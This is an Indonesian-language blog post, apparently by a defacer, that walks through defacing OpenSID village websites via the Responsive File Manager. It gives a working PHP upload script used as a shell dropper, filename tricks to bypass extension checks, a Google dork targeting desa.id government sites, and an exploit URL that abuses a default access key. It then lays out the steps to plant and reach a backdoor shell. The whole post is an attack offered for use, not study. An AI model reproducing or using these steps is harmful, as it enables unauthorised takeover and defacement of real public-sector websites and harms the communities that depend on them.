Deface Remote File Manager(RFM) OpenSid

 

Ok kali ini gw bakal share cara deface remote file manager(rfm) opensid.ini poc sihh udah cukup lama,cuma gw nya males,jadi baru buat :v

• Bahan

- kuota

- niat

- shell backdoor

• Uploader

<? echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully :p</b><br><br>'; } else { echo '<b>Upload Failed! >:( </b><br><br>'; } } ?>

Cukup kita inject filenamenya ajh biar cepet,simpan dengan extensi :

php<?.html

php<?.txt

php<?.jpg

• Dork

site:desa.id inurl:/first intitle:Website Resmi

• Xploit

assets/filemanager/dialog.php?akey=GantiKunciDesa

1.Kalian dorking dulu,klian kembangin sendiri dorknya

2.pilih salah 1 webnya,dan masukin xploitnya

(Vuln)

3.klik yang garis tiga di pojok kanan atas

4.kalian upload uploader yg gw kasih diatas dan xtensinya.

5.kalo centang berarti berhasil/tertanam

6.tinggal kita panggil uploaderny,kita cukup panggil kek dibawah,karna udah auto ke rename

/desa/upload/media/uploader.php

7.tinggal upload shell dan akses dehh

/desa/upload/media/namashell.php

Ok makasih yang udah visit,maaf late post :v